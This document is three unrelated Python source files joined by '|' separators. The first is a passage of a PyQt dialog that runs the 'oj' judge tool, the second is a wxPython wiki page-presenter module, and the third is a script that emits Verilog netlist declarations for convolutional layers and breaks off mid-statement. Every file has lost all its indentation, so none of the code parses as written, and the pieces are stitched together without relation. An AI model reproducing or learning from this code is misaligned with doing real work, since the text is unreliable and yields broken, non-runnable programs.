for name, widget in self.dialogs:
if not widget:
l_widget = QtWidgets.QGroupBox(name)
l_widget.setStyleSheet(
"""
QGroupBox {
color: white;
border: 1px solid gray;
border-radius: 9px;
margin-top: 0.5em;
}
QGroupBox::title {
color: white;
subcontrol-origin: margin;
left: 10px;
padding: 0 3px 0 3px;
}
"""
)
l_widget.setFlat(False)
section_layout = QtWidgets.QFormLayout()
l_widget.setLayout(section_layout)
main_layout.addWidget(l_widget)
else:
section_layout.addRow(name, widget)
test_button = QtWidgets.QPushButton("Test")
test_button.clicked.connect(self.test)
main_layout.addWidget(test_button)
self.setLayout(main_layout)
def test(self):
for name, widget in self.dialogs:
try:
widget.commit()
except AttributeError:
pass
self.parent().recorder.push(
self.parent().browser_widget.browser.url().toString(), "test"
)
try:
command = ["oj", "test", "-c", self.compiled_file]
if self.float_error_edit.text():
command += ["-e", str(self.float_error_edit.text())]
if self.tle_edit.text():
command += ["--tle", str(self.tle_edit.text())]
if self.mle_edit.text():
command += ["--mle", str(self.mle_edit.text())]
out = subprocess.check_output(
command, stderr=subprocess.STDOUT, timeout=4.0
).decode()
self.console.writeLnSignal.emit(out)
except subprocess.TimeoutExpired as e:
self.console.writeLnSignal.emit(e.output)
self.console.writeLnSignal.emit("[-] Test is Timeout")
except subprocess.CalledProcessError as e:
self.console.writeLnSignal.emit(e.output)
self.close()
class TestReactiveDialog(QtWidgets.QDialog):
def __init__(self, *args, compiled_file: str, settings):
super().__init__(*args)
self.console = self.parent().console
self.compiled_file = compiled_file
self.judge_command = util.StateFullTextEdit(
settings, "TEST_COMMAND", self, "./judge"
)
self.dialogs = (("Submit...", None), ("JUDGE COMMAND", self.judge_command))
self.draw()
def draw(self, *args):
main_layout = QtWidgets.QVBoxLayout()
for name, widget in self.dialogs:
if not widget:
l_widget = QtWidgets.QGroupBox(name)
l_widget.setStyleSheet(
"""
QGroupBox {
color: white;
border: 1px solid gray;
border-radius: 9px;
margin-top: 0.5em;
}
QGroupBox::title {
color: white;
subcontrol-origin: margin;
left: 10px;
padding: 0 3px 0 3px;
}
"""
)
l_widget.setFlat(False)
section_layout = QtWidgets.QFormLayout()
l_widget.setLayout(section_layout)
main_layout.addWidget(l_widget)
else:
section_layout.addRow(name, widget)
test_button = QtWidgets.QPushButton("Test")
test_button.clicked.connect(self.test)
main_layout.addWidget(test_button)
self.setLayout(main_layout)
def test(self):
for name, widget in self.dialogs:
try:
widget.commit()
except AttributeError:
pass
try:
command = ["oj", "t/r", "-c", self.compiled_file, self.judge_command.text()]
out = subprocess.check_output(
command, stderr=subprocess.STDOUT, timeout=4.0
).decode()
self.console.writeLnSignal.emit(out)
except subprocess.TimeoutExpired as e:
self.console.writeLnSignal.emit(e.output)
self.console.writeLnSignal.emit("[-] Test is Timeout")
except subprocess.CalledProcessError as e:
self.console.writeLnSignal.emit(e.output)
self.close()
|
<filename>lib/pwiki/DocPagePresenter.py<gh_stars>10-100
## import hotshot
## _prof = hotshot.Profile("hotshot.prf")
import traceback
import wx
import wx.xrc as xrc
from WikiExceptions import *
from wxHelper import getAccelPairFromKeyDown, copyTextToClipboard, GUI_ID
from .MiscEvent import ProxyMiscEvent # , KeyFunctionSink
from .WikiHtmlView import createWikiHtmlView
from . import DocPages
from . import SystemInfo
from .StringOps import uniToGui, escapeForIni, unescapeForIni
from .WindowLayout import LayeredControlPresenter, LayerSizer, StorablePerspective
from .PageHistory import PageHistory
from . import pygauge as PG
class BasicDocPagePresenter(LayeredControlPresenter):
"""
Controls the group of all widgets (subcontrols) used to present/edit
a particular doc page, currently only the WikiTxtCtrl (subcontrol name
"textedit") and WikiHtmlView or WikiHtmlViewIE (name "preview").
This version isn't itself a wx panel and is mainly thought for
controlling e.g. a notebook which has the actual subcontrols as
children
"""
def __init__(self, mainControl):
LayeredControlPresenter.__init__(self)
self.mainControl = mainControl
self.docPage = None
self.currentDocPageProxyEvent = ProxyMiscEvent(self)
self.currentDocPageProxyEvent.addListener(self)
# Connect page history
self.pageHistory = PageHistory(self.getMainControl(), self)
self.getMainControl().getMiscEvent().addListener(self)
def getMainControl(self):
return self.mainControl
def getConfig(self):
return self.getMainControl().getConfig()
def getDefaultFontFaces(self):
return self.getMainControl().presentationExt.faces
def getWikiDocument(self):
return self.getMainControl().getWikiDocument()
def getPageHistory(self):
return self.pageHistory
def getActiveEditor(self):
"""
For compatibility with older scripts.
"""
return self.getSubControl("textedit")
def SetStatusText(self, text, field):
self.getStatusBar().SetStatusText(uniToGui(text), field)
def showStatusMessage(self, msg, duration=0, key=None):
self.getMainControl().showStatusMessage(msg, duration, key)
def isCurrent(self):
return self.getMainControl().getCurrentDocPagePresenter() is self
def makeCurrent(self):
self.mainControl.getMainAreaPanel().prepareCurrentPresenter(self)
def close(self):
LayeredControlPresenter.close(self)
self.getMainControl().getMiscEvent().removeListener(self)
self.pageHistory.close()
self.setDocPage(None) # TODO: Was commented out?
def getDocPage(self):
return self.docPage
def setDocPage(self, dp):
self.docPage = dp
self.currentDocPageProxyEvent.setWatchedSource(dp)
def getCurrentDocPageProxyEvent(self):
"""
This ProxyMiscEvent resends any messsages from the currently
active DocPage
"""
return self.currentDocPageProxyEvent
def getWikiWord(self):
docPage = self.getDocPage()
if docPage is None or not isinstance(docPage,
(DocPages.WikiPage, DocPages.AliasWikiPage)):
return None
return docPage.getWikiWord()
def getUnifiedPageName(self):
docPage = self.getDocPage()
if docPage is None:
return None
return docPage.getUnifiedPageName()
def getLiveText(self):
docPage = self.getDocPage()
if docPage is None:
return None
return docPage.getLiveText()
def informEditorTextChanged(self, changer):
"""
Called by the txt editor control
"""
if self.getDocPage() is not None:
self.getDocPage().informEditorTextChanged(changer)
self.fireMiscEventProps({"changed editor text": True,
"changed live text": True, "changer": changer})
def miscEventHappened(self, miscevt):
"""
Handle misc events
"""
if miscevt.getSource() is self.getMainControl():
# TODO? Check if mainControl's current presenter is this one
self.fireMiscEventProps(miscevt.getProps())
elif miscevt.getSource() is self.docPage:
# if miscevt.has_key("changed editor text"):
# self.fireMiscEventProps(miscevt.getProps())
# elif miscevt.has_key("deleted page"):
# self.pageHistory.goAfterDeletion()
if miscevt.has_key("renamed wiki page"):
# oldWord = self.docPage.getWikiWord()
newWord = miscevt.get("newWord")
self.getSubControl("textedit").loadWikiPage(None)
self.openWikiPage(newWord, forceTreeSyncFromRoot=False)
def getStatusBar(self):
return self.getMainControl().GetStatusBar()
def openDocPage(self, unifiedPageName, *args, **kwargs):
"""
Open a doc page identified by its unified page name
"""
if len(unifiedPageName) == 0:
return
if unifiedPageName.startswith(u"wikipage/"):
self.openWikiPage(unifiedPageName[9:], *args, **kwargs)
else:
self.openFuncPage(unifiedPageName, *args, **kwargs)
def openFuncPage(self, funcTag, addToHistory=True, **evtprops):
if not self.getMainControl().requireReadAccess():
return
oldPage = self.getDocPage()
evtprops["addToHistory"] = addToHistory
try:
page = self.getMainControl().getWikiDocument().getFuncPage(funcTag)
self.getSubControl("textedit").loadFuncPage(page, evtprops)
except (IOError, OSError, DbAccessError), e:
self.getMainControl().lostAccess(e)
raise
self.switchSubControl("textedit")
p2 = evtprops.copy()
p2.update({"loaded current doc page": True,
"loaded current functional page": True,
"docPage": page,
"oldDocPage": oldPage})
# p2.update({"loaded current page": True})
self.fireMiscEventProps(p2)
page.informVisited()
def openWikiPage(self, wikiWord, addToHistory=True,
forceTreeSyncFromRoot=False, forceReopen=False,
suggNewPageTitle=None, **evtprops):
"""
Opens a wiki page in the editor of this presenter
"""
if not self.getMainControl().requireReadAccess():
return
# oldPage = self.getDocPage()
evtprops["addToHistory"] = addToHistory
evtprops["forceTreeSyncFromRoot"] = forceTreeSyncFromRoot
langHelper = wx.GetApp().createWikiLanguageHelper(
self.getWikiDocument().getWikiDefaultWikiLanguage())
errMsg = None
# The "if" ensures that existing pages can be opened even
# if the syntax is (or became) incompatible
if not self.getWikiDocument().isDefinedWikiPageName(wikiWord):
errMsg = langHelper.checkForInvalidWikiWord(wikiWord,
self.getWikiDocument())
if errMsg is not None:
self.getMainControl().displayErrorMessage(
_(u"'%s' is an invalid wiki word. %s.") % (wikiWord, errMsg))
return
try:
# don't reopen the currently open page, only send an event
if (wikiWord == self.getWikiWord()) and not forceReopen:
p2 = evtprops.copy()
p2.update({"reloaded current doc page": True,
"reloaded current wiki page": True})
self.fireMiscEventProps(p2)
if forceTreeSyncFromRoot:
self.getMainControl().findCurrentWordInTree()
return
# trigger hook
self.getMainControl().hooks.openWikiWord(self, wikiWord)
# check if this is an alias
wikiDoc = self.getMainControl().getWikiDocument()
wikiWord = wikiDoc.getWikiPageNameForLinkTermOrAsIs(wikiWord)
# fetch the page info from the database
try:
page = wikiDoc.getWikiPage(wikiWord)
# self.getStatusBar().SetStatusText(uniToGui(_(u"Opened wiki word '%s'") %
# wikiWord), 0)
except (WikiWordNotFoundException, WikiFileNotFoundException), e:
page = wikiDoc.createWikiPage(wikiWord,
suggNewPageTitle=suggNewPageTitle)
# trigger hooks
self.getMainControl().hooks.newWikiWord(self, wikiWord)
self.showStatusMessage(
uniToGui(_(u"Wiki page not found, a new "
u"page will be created")))
# self.getStatusBar().SetStatusText(uniToGui(u""), 1)
self.loadWikiPage(page, **evtprops)
page.informVisited()
# sync the tree
if forceTreeSyncFromRoot:
self.getMainControl().findCurrentWordInTree() # TODO ?
except (IOError, OSError, DbAccessError), e:
self.getMainControl().lostAccess(e)
raise
# trigger hook
self.getMainControl().hooks.openedWikiWord(self, wikiWord)
def loadWikiPage(self, page, **evtprops):
oldPage = self.getDocPage() # TODO Test if too late to retrieve old page here
self.getSubControl("textedit").loadWikiPage(page, evtprops)
self.getMainControl().refreshPageStatus() # page)
p2 = evtprops.copy()
p2.update({"loaded current doc page": True,
"loaded current wiki page": True,
"docPage": page,
"oldDocPage": oldPage})
self.fireMiscEventProps(p2)
self.getMainControl().getMainAreaPanel().updateConfig()
# Should the page by default be presented in editor or preview mode?
pv = page.getAttributeOrGlobal(u"view_pane")
if pv is not None:
pv = pv.lower()
if pv == u"preview":
self.switchSubControl("preview")
elif pv == u"editor":
self.switchSubControl("textedit")
# else: do nothing (pv == u"off")
def saveCurrentDocPage(self, force = False):
## _prof.start()
if (force or self.getDocPage().getDirty()[0]) and \
self.getMainControl().requireWriteAccess():
# Reset error flag here, it can be set true again by saveDocPage
# self.getWikiDocument().setNoAutoSaveFlag(False)
try:
# this calls in turn saveDocPage() in PersonalWikiFrame
self.getSubControl("textedit").saveLoadedDocPage()
except (IOError, OSError, DbAccessError), e:
self.getMainControl().lostAccess(e)
raise
self.getMainControl().refreshPageStatus()
## _prof.stop()
def stdDialog(self, dlgtype, title, message, additional=None):
"""
Show message dialogs, used for scripts.
Calls same function from PersonalWikiFrame.
"""
return self.mainControl.stdDialog(dlgtype, title, message, additional)
def displayMessage(self, title, str):
"""pops up a dialog box,
used by scripts only
"""
self.mainControl.displayMessage(title, str)
def displayErrorMessage(self, errorStr, e=u""):
self.mainControl.displayErrorMessage(errorStr, e)
class DocPagePresenter(wx.Panel, BasicDocPagePresenter, StorablePerspective):
"""
Controls the group of all widgets (subcontrols) used to present/edit
a particular doc page, currently only WikiTxtCtrl and WikiHtmlView.
This version is a panel and contains the children itself.
"""
def __init__(self, parent, mainControl, id=-1):
wx.Panel.__init__(self, parent, id, style=wx.WANTS_CHARS)
BasicDocPagePresenter.__init__(self, mainControl)
self.SetSizer(LayerSizer())
res = xrc.XmlResource.Get()
self.tabContextMenu = res.LoadMenu("MenuDocPagePresenterTabPopup")
self.mainTreePositionHint = None # The tree ctrl uses this to remember
# which element was selected if same page appears multiple
# times in tree. DocPagePresenter class itself does not modify it.
self.tabProgressBar = None
self.tabProgressCount = {}
wx.GetApp().getMiscEvent().addListener(self)
wx.EVT_MENU(self, GUI_ID.CMD_PAGE_HISTORY_LIST,
lambda evt: self.viewPageHistory())
wx.EVT_MENU(self, GUI_ID.CMD_PAGE_HISTORY_LIST_UP,
lambda evt: self.viewPageHistory(-1))
wx.EVT_MENU(self, GUI_ID.CMD_PAGE_HISTORY_LIST_DOWN,
lambda evt: self.viewPageHistory(1))
wx.EVT_MENU(self, GUI_ID.CMD_PAGE_HISTORY_GO_BACK,
lambda evt: self.pageHistory.goInHistory(-1))
wx.EVT_MENU(self, GUI_ID.CMD_PAGE_HISTORY_GO_FORWARD,
lambda evt: self.pageHistory.goInHistory(1))
wx.EVT_MENU(self, GUI_ID.CMD_PAGE_GO_UPWARD_FROM_SUBPAGE,
lambda evt: self.goUpwardFromSubpage())
def close(self):
wx.GetApp().getMiscEvent().removeListener(self)
BasicDocPagePresenter.close(self)
def setSubControl(self, scName, sc):
oldSc = self.getSubControl(scName)
if oldSc is not None:
self.GetSizer().Detach(oldSc)
oldSc.close()
BasicDocPagePresenter.setSubControl(self, scName, sc)
if sc is not None:
self.GetSizer().Add(sc)
self.Layout()
def switchSubControl(self, scName, gainFocus=False):
"""
Make the chosen subcontrol visible, all other invisible
"""
try:
subControl = self.subControls[scName]
except KeyError:
traceback.print_exc()
return
# First show subControl scName, then hide the others
# to avoid flicker
if self.visible and self.lastVisibleCtrlName != scName:
subControl.setLayerVisible(True)
subControl.Show(True)
if gainFocus:
subControl.SetFocus()
for n, c in self.subControls.iteritems():
# if n != scName:
if c is not subControl:
if self.visible:
c.setLayerVisible(False)
c.Show(False)
self.lastVisibleCtrlName = scName
self.setTitle(self.shortTitle) #?
if SystemInfo.isLinux():
def SetFocus(self):
try:
ctrl = self.subControls[self.lastVisibleCtrlName]
wx.CallAfter(ctrl.SetFocus)
except KeyError:
wx.Panel.SetFocus(self)
else:
def SetFocus(self):
try:
self.subControls[self.lastVisibleCtrlName].SetFocus()
except KeyError:
wx.Panel.SetFocus(self)
def viewPageHistory(self, posDelta=0):
if not self.getMainControl().requireReadAccess():
return
try:
hist = self.pageHistory.getHrHistoryList()
histpos = self.pageHistory.getPosition()
except (IOError, OSError, DbAccessError), e:
self.getMainControl().lostAccess(e)
raise
historyLen = len(hist)
dlg = wx.SingleChoiceDialog(self,
_(u"History"),
_(u"History"),
hist,
wx.CHOICEDLG_STYLE | wx.OK | wx.CANCEL)
if historyLen > 0:
position = histpos + posDelta - 1
if (position < 0):
position = 0
elif (position >= historyLen):
position = historyLen-1
dlg.SetSelection(position)
if dlg.ShowModal() == wx.ID_OK and dlg.GetSelection() > -1:
self.pageHistory.goInHistory(dlg.GetSelection() - (histpos - 1))
dlg.Destroy()
def goUpwardFromSubpage(self):
wikiWord = self.getWikiWord()
if wikiWord is None:
return
langHelper = wx.GetApp().createWikiLanguageHelper(
self.getWikiDocument().getWikiDefaultWikiLanguage())
wikiPath = langHelper.createWikiLinkPathObject(pageName=wikiWord)
wikiPath.join(langHelper.createWikiLinkPathObject(upwardCount=1))
upwardPageName = wikiPath.resolveWikiWord(None)
if not upwardPageName or wikiWord == upwardPageName:
# No way upward
# TODO: Maybe alternative reaction?
return
# motion type "parent" isn't exactly right but a good guess
self.openWikiPage(upwardPageName, motionType="parent")
def getTabContextMenu(self):
return self.tabContextMenu
def setTitle(self, shortTitle):
LayeredControlPresenter.setTitle(self, shortTitle)
# Shorten title if too long
maxLen = self.getConfig().getint("main", "tabs_maxCharacters", 0)
if maxLen > 0 and len(shortTitle) > maxLen:
shortTitle = shortTitle[:(maxLen//2)] + u"..." + \
shortTitle[-((maxLen+1)//2):]
self.fireMiscEventProps({"changed presenter title": True,
"title": shortTitle})
def miscEventHappened(self, miscevt):
if miscevt.getSource() is wx.GetApp():
# The option "tabs_maxCharacters" may be changed, so set title again
if miscevt.has_key("options changed"):
self.setTitle(self.shortTitle)
return
return BasicDocPagePresenter.miscEventHappened(self, miscevt)
def fillDefaultSubControls(self):
self.setLayerVisible(False)
self.Hide()
editor = self.getMainControl().createWindow({"name": "txteditor1",
"presenter": self}, self)
editor.setLayerVisible(False, "textedit")
self.setSubControl("textedit", editor)
htmlView = createWikiHtmlView(self, self, -1)
htmlView.setLayerVisible(False, "preview")
self.setSubControl("preview", htmlView)
self.switchSubControl("textedit")
def getAUITabCtrl(self):
return self.getMainControl().mainAreaPanel.getTabCtrlByPresenter(self)
def getAUITabPage(self):
pIndex = self.getMainControl().mainAreaPanel.getIndexForPresenter(self)
return self.getMainControl().mainAreaPanel.GetPageInfo(pIndex)
#tabCtrl = self.getAUITabCtrl()
#return tabCtrl.GetPage(tabCtrl.GetActivePageIdx())
def setTabTitleColour(self, colour):
self.getAUITabPage().text_colour = colour
self.getAUITabCtrl().Refresh()
def setTabProgressThreadSafe(self, percent, thread, colour=wx.GREEN):
try:
thread.testValidThread()
wx.CallAfter(self.setTabProgress, percent, thread, colour)
except NotCurrentThreadException:
return
def onProgressBarClicked(self, evt):
# Activate tab that is clicked on
self.getMainControl().mainAreaPanel.showPresenter(self)
def onProgressBarContext(self, evt):
self.getMainControl().mainAreaPanel.OnTabContextMenu(evt, self)
def setTabProgress(self, percent, thread="page", colour=None):
try:
if thread in self.tabProgressCount:
colour = self.tabProgressCount[thread][0]
if percent == 0:
self.tabProgressCount[thread] = (colour, percent)
else:
if thread not in self.tabProgressCount:
return
if percent == 100:
del self.tabProgressCount[thread]
if self.getAUITabCtrl() is None:
return
if self.tabProgressBar is None:
self.tabProgressBar = PG.PyGauge(self.getAUITabCtrl(), -1, size=(40, 15), style=wx.GA_HORIZONTAL)
# Use EVT_CHILD_FOCUS to detect when the progress bar is
# clicked on as no click event seems to be emitted
self.tabProgressBar.Bind(wx.EVT_CHILD_FOCUS,
self.onProgressBarClicked)
self.tabProgressBar.Bind(wx.EVT_CONTEXT_MENU,
self.onProgressBarContext)
if percent == 100:
if len(self.tabProgressCount) < 1:
self.tabProgressBar.Hide()
self.getAUITabPage().control = None
self.getAUITabCtrl().Refresh()
return
else:
for thread in self.tabProgressCount:
colour, percent = self.tabProgressCount[thread]
break
if self.getAUITabPage().control is None:
self.getAUITabPage().control = self.tabProgressBar
self.tabProgressBar.SetValue(percent)
self.tabProgressBar.SetBarColour(colour)
self.tabProgressBar.SetBorderColour(wx.BLACK)
self.getAUITabCtrl().Refresh()
except wx.PyDeadObjectError:
pass
# ----- Implementation of StorablePerspective methods -----
@staticmethod
def getPerspectiveType():
return u"DocPagePresenter"
def getStoredPerspective(self):
unifName = self.getUnifiedPageName()
if unifName is None:
return None
return escapeForIni(self.getCurrentSubControlName(), u"|") + u"|" + \
escapeForIni(unifName, u"|")
# def setByStoredPerspective(self, perspectType, data, typeFactory):
# raise NotImplementedError
def deleteForNewPerspective(self):
self.close()
StorablePerspective.deleteForNewPerspective(self)
@staticmethod
def createFromPerspective(mainControl, parent, perspectType, wndPerspective,
typeFactory):
"""
Not part of StorablePerspective, called by the type factory
"""
# if more parts are available after a second '|' they are ignored
subControl, unifName = wndPerspective.split(u"|", 2)[:2]
# unescape
subControl = unescapeForIni(subControl)
unifName = unescapeForIni(unifName)
wnd = DocPagePresenter(parent, mainControl)
wnd.fillDefaultSubControls()
wnd.openDocPage(unifName)
wnd.switchSubControl(subControl)
return wnd
|
'''
it is design to all layer pass
'''
import numpy as np
import os
import shutil
def set_dir(filepath, file):
if not os.path.exists(filepath):
os.mkdir(filepath)
# else:
# shutil.rmtree(filepath)
# os.mkdir(filepath)
PATH = str(filepath) + '/' + str(file)
with open(PATH, 'w') as f:
f.seek(0)
f.truncate()
return PATH
def int2str(a):
# if == 10, A
if a > 9:
a = chr(a + 55)
else:
a = a
return a
def dump_unit_layer3(filename, layer_idx, input_fm, weights, pre_pad_stride, pad_stride, next_pad_stride, max_stride):
layer_idx = layer_idx
# 0: 1*3*30*30 -> 3*30*30
# 1: 1*4*14*14
# 2: 1*8*7*7
# 3: 1*16*5*5
# 4: 1*32*3*3
input_fm = input_fm.squeeze() # 1*4*14*14 -> 4*14*14
input_fm_c = input_fm.shape[0] # 4
input_fm_h = input_fm.shape[1] # 14
input_fm_w = input_fm.shape[2] # 14
if pre_pad_stride:
input_fm_h = input_fm.shape[1] - pre_pad_stride * 2
input_fm_w = input_fm.shape[2] - pre_pad_stride * 2
if layer_idx == 0:
input_fm = input_fm
else:
if pad_stride:
input_fm = np.pad(input_fm, ((0, 0), (1, 1), (1, 1)), 'constant', constant_values=(1, 1)) # if true 4*16*16
weights_c = weights.shape[1] # 4 (8,4,3,3)
weights_h = weights.shape[2] # 3
weights_w = weights.shape[3] # 3
# after conv
input_fm_h_ = int((input_fm_h - weights_h + 2 * pad_stride) / 1 + 1) # 14
input_fm_w_ = int((input_fm_w - weights_h + 2 * pad_stride) / 1 + 1) # 14
# final size
out_fm_c = weights.shape[0] # 8
print("only when layer_idx = 0, 1 pad_stride = 1!")
conv_fm_h = int((input_fm_h - weights_h + 2 * pad_stride) / 1 + 1) # 14
conv_fm_w = conv_fm_h # 14
if max_stride == 2:
conv_fm_h = int(conv_fm_h / max_stride) # 7
conv_fm_w = int(conv_fm_w / max_stride) # 7
# 1. dump layer_idx wire Point num = 16*16*4 = 1024************************************************
# wire P1000,P1010,P1020,P1100,P0110,P0120,P0200,P0210,P0220;
# with open (filename, 'a') as f:
# P_unit_list = []
# for j in range(input_fm_c): # 4
# for k in range(input_fm.shape[1]): # 16
# for l in range(input_fm.shape[2]): # 16
# P_unit_idx = "P" + str(layer_idx) + str(int2str(k)) + str(int2str(l)) + str(int2str(j))
# if k == 0 or l == 0:
# f.write("wire " + str(P_unit_idx) + ";\n")
# f.close()
# 2. dump layer_idx + 1 wire Point num = 7*7*8 = 392************************************************
# due to next_pad_stride = 0, so first point = k
# due to next_pad_stride = 1, so first point = k + 1
# wire P1000;
i = 0
for j in range(out_fm_c): # 8
for k in range(conv_fm_h): # 7
if next_pad_stride == 1:
k = k + 1
for l in range(conv_fm_w): # 7
if next_pad_stride == 1:
l = l + 1
out_P_unit_num_0 = "P" + \
str(layer_idx + 1) + \
str(int2str(k)) + \
str(int2str(l)) + \
str(int2str(j))
with open (filename, 'a') as f:
f.write("(*DONT_TOUCH=\"true\"*) wire " + str(out_P_unit_num_0) + ";\n")
i += 1
f.close()
if i == (out_fm_c * conv_fm_h * conv_fm_w):
print("2. Dump pass!")
else:
print("2. Dump layer_idx + 1 wire P1000; false!")
# 3. dump layer_idx wire Weihts num = 8*4*3*3 = 288 ************************************************
# e.g. wire W00000,W00010,W00020,W00100,W00110,W00120,W00200,W00210,W00220;
i = 0
W_unit = []
for j in range(out_fm_c): # 8
for k in range(input_fm_c): # 4
for l in range(weights_h): # 3
for m in range(weights_w): # 3
W_unit_idx = "W" + \
str(layer_idx) + \
str(int2str(j)) + \
str(int2str(l)) + \
str(int2str(m)) + \
str(int2str(k))
W_unit.append(W_unit_idx)
i += 1
with open (filename, 'a') as f:
f.write("(*DONT_TOUCH=\"true\"*) wire " + str(W_unit[0]) + "," + str(W_unit[1]) + "," + str(W_unit[2]) + ","
+ str(W_unit[3]) + "," + str(W_unit[4]) + "," + str(W_unit[5]) + ","
+ str(W_unit[6]) + "," + str(W_unit[7]) + "," + str(W_unit[8])
+";\n")
W_unit.clear()
f.close()
if i == (out_fm_c * input_fm_c * weights_h * weights_w):
print("3. Dump pass!")
else:
print("3. Dump wire W00000,W00010,W00020,W00100,W00110,W00120,W00200,W00210,W00220; false")
# 4. dump c00000 num 4*28*28 = 3136 -> 8*14*14 ************************************************
# wire [3:0]c00000,c01000,c02000;
c_unit = []
m = 0
with open (filename, 'a') as f:
for i in range(out_fm_c): # 8
for k in range(input_fm_h_): # 14
for l in range(input_fm_w_): # 14
f.write("(*DONT_TOUCH=\"true\"*) wire " + "signed [4:0] ")
for j in range(input_fm_c): # 4
c_unit_idx = 'c' + \
str(layer_idx) + \
str(int2str(j)) + \
str(int2str(k)) + \
str(int2str(l)) + \
str(int2str(i))
c_unit.append(c_unit_idx)
if j == (input_fm_c - 1):
f.write(c_unit[0] + ";\n")
else:
f.write(c_unit[0] + ",")
c_unit.clear()
m += 1
f.close()
if m == (out_fm_c * input_fm_h_ * input_fm_w_ * input_fm_c):
print("4. Dump pass!")
else:
print("4. Dump wire signed [3:0] c00000,c01000,c02000; false")
# 5. dump C0000 num = 4 * 14 * 14 = 784 -> 8*7*7 = 392
# 6. dump A0000 == C0000
# wire [5:0]C0000,C0010,C0100,C0110;
j = 0
if layer_idx == 0:
number = 6
if layer_idx == 1:
number = 6
if layer_idx == 2:
number = 7
if layer_idx == 3:
number = 8
if layer_idx == 4:
number = 9
with open (filename, 'a') as f:
for i in range(out_fm_c): # 8
for k in range(input_fm_h_): # 14
for l in range(input_fm_w_): # 14
C_unit_0 = "C" + \
str(layer_idx) + \
str(int2str(k)) + \
str(int2str(l)) + \
str(int2str(i))
A_unit_0 = "A" + \
str(layer_idx) + \
str(int2str(k)) + \
str(int2str(l)) + \
str(int2str(i))
f.write("(*DONT_TOUCH=\"true\"*) wire " + "signed [" + str(number) +":0] " + str(C_unit_0) + ";\n")
f.write("(*DONT_TOUCH=\"true\"*) wire " + str(A_unit_0) +";\n")
j += 1
f.close()
if j == (out_fm_c * input_fm_h_ * input_fm_w_):
print("5. Dump pass!")
print("6. Dump pass!")
else:
print("5. Dump wire signed [5:0] C0000,C0010,C0100,C0110; false")
print("6. Dump wire A0000,A0010,A0100,A0110; false")
# 7. dump DFF_save_fm DFF_P0(.clk(clk),.rstn(rstn),.reset_value(0),.q(P0000));
# num = 30*30*3 = 2700
# 8. dump DFF_save_fm DFF_W0(.clk(clk),.rstn(rstn),.reset_value(0),.q(W00000));
# num = 4*3*3*3 = 108 - 8*4*3*3
weight_dict = {}
i = 0
weights_list = []
for j in range(out_fm_c): # 8
for k in range(weights_c): # 4
for l in range(weights_h): # 3
for m in range(weights_w): # 3
temp = 'W' + \
str(layer_idx) + \
str(int2str(j)) + \
str(int2str(l)) + \
str(int2str(m)) + \
str(int2str(k))
weights_list.append(temp)
value_temp = weights.flat[i].astype(np.int)
if value_temp == -1:
value_temp = 0
weight_dict[weights_list[i]] = value_temp
else:
weight_dict[weights_list[i]] = value_temp
i += 1
with open (filename, 'a') as f:
i = 1440
for key, value in weight_dict.items():
dff_weights_idx = i
reset_value_w = value
weights_list = key
f.write("DFF_save_fm DFF_W" + \
str(dff_weights_idx) + \
"(.clk(clk),.rstn(rstn),.reset_value(" + \
str(value) + "),.q(" + \
str(key) + "));\n")
i += 1
f.close()
# 9. dump ninexnine_unit, num = 4*3*28*28
with open (filename, 'a') as f:
h = 9472
# g = 0
c_idx_list = []
# print('Warning, when dump ninexnine_unit, ' +
# 'if input_fm_c != 3, than need to add c_idx_list[2]')
# save Point_unit_idx
for i in range(out_fm_c): # 8
for j in range(input_fm_h_): # 14
for k in range(input_fm_w_): # 14
for l in range(input_fm_c): # 3
P_idx_0 = "P" + str(layer_idx) + str(int2str(j + 0)) + str(int2str(k + 0)) + str(int2str(l))
P_idx_1 = "P" + str(layer_idx) + str(int2str(j + 0)) + str(int2str(k + 1)) + str(int2str(l))
P_idx_2 = "P" + str(layer_idx) + str(int2str(j + 0)) + str(int2str(k + 2)) + str(int2str(l))
P_idx_3 = "P" + str(layer_idx) + str(int2str(j + 1)) + str(int2str(k + 0)) + str(int2str(l))
P_idx_4 = "P" + str(layer_idx) + str(int2str(j + 1)) + str(int2str(k + 1)) + str(int2str(l))
P_idx_5 = "P" + str(layer_idx) + str(int2str(j + 1)) + str(int2str(k + 2)) + str(int2str(l))
P_idx_6 = "P" + str(layer_idx) + str(int2str(j + 2)) + str(int2str(k + 0)) + str(int2str(l))
P_idx_7 = "P" + str(layer_idx) + str(int2str(j + 2)) + str(int2str(k + 1)) + str(int2str(l))
P_idx_8 = "P" + str(layer_idx) + str(int2str(j + 2)) + str(int2str(k + 2)) + str(int2str(l))
W_idx_0 = "W" + str(layer_idx) + str(int2str(i)) + str(0) + str(0) + str(int2str(l))
W_idx_1 = "W" + str(layer_idx) + str(int2str(i)) + str(0) + str(1) + str(int2str(l))
W_idx_2 = "W" + str(layer_idx) + str(int2str(i)) + str(0) + str(2) + str(int2str(l))
W_idx_3 = "W" + str(layer_idx) + str(int2str(i)) + str(1) + str(0) + str(int2str(l))
W_idx_4 = "W" + str(layer_idx) + str(int2str(i)) + str(1) + str(1) + str(int2str(l))
W_idx_5 = "W" + str(layer_idx) + str(int2str(i)) + str(1) + str(2) + str(int2str(l))
W_idx_6 = "W" + str(layer_idx) + str(int2str(i)) + str(2) + str(0) + str(int2str(l))
W_idx_7 = "W" + str(layer_idx) + str(int2str(i)) + str(2) + str(1) + str(int2str(l))
W_idx_8 = "W" + str(layer_idx) + str(int2str(i)) + str(2) + str(2) + str(int2str(l))
c_idx = "c" + str(layer_idx) + \
str(int2str(l)) + \
str(int2str(j)) + \
str(int2str(k)) + \
str(int2str(i))
c_idx_list.append(c_idx)
f.write("ninexnine_unit ninexnine_unit_" +
str(h) + "(\n\t\t\t\t" +
".clk(clk),\n" +
"\t\t\t\t.rstn(rstn),\n" +
"\t\t\t\t.a0(" + str(P_idx_0) + "),\n" +
"\t\t\t\t.a1(" + str(P_idx_1) + "),\n" +
"\t\t\t\t.a2(" + str(P_idx_2) + "),\n" +
"\t\t\t\t.a3(" + str(P_idx_3) + "),\n" +
"\t\t\t\t.a4(" + str(P_idx_4) + "),\n" +
"\t\t\t\t.a5(" + str(P_idx_5) + "),\n" +
"\t\t\t\t.a6(" + str(P_idx_6) + "),\n" +
"\t\t\t\t.a7(" + str(P_idx_7) + "),\n" +
"\t\t\t\t.a8(" + str(P_idx_8) + "),\n" +
"\t\t\t\t.b0(" + str(W_idx_0) + "),\n" +
"\t\t\t\t.b1(" + str(W_idx_1) + "),\n" +
"\t\t\t\t.b2(" + str(W_idx_2) + "),\n" +
"\t\t\t\t.b3(" + str(W_idx_3) + "),\n" +
"\t\t\t\t.b4(" + str(W_idx_4) + "),\n" +
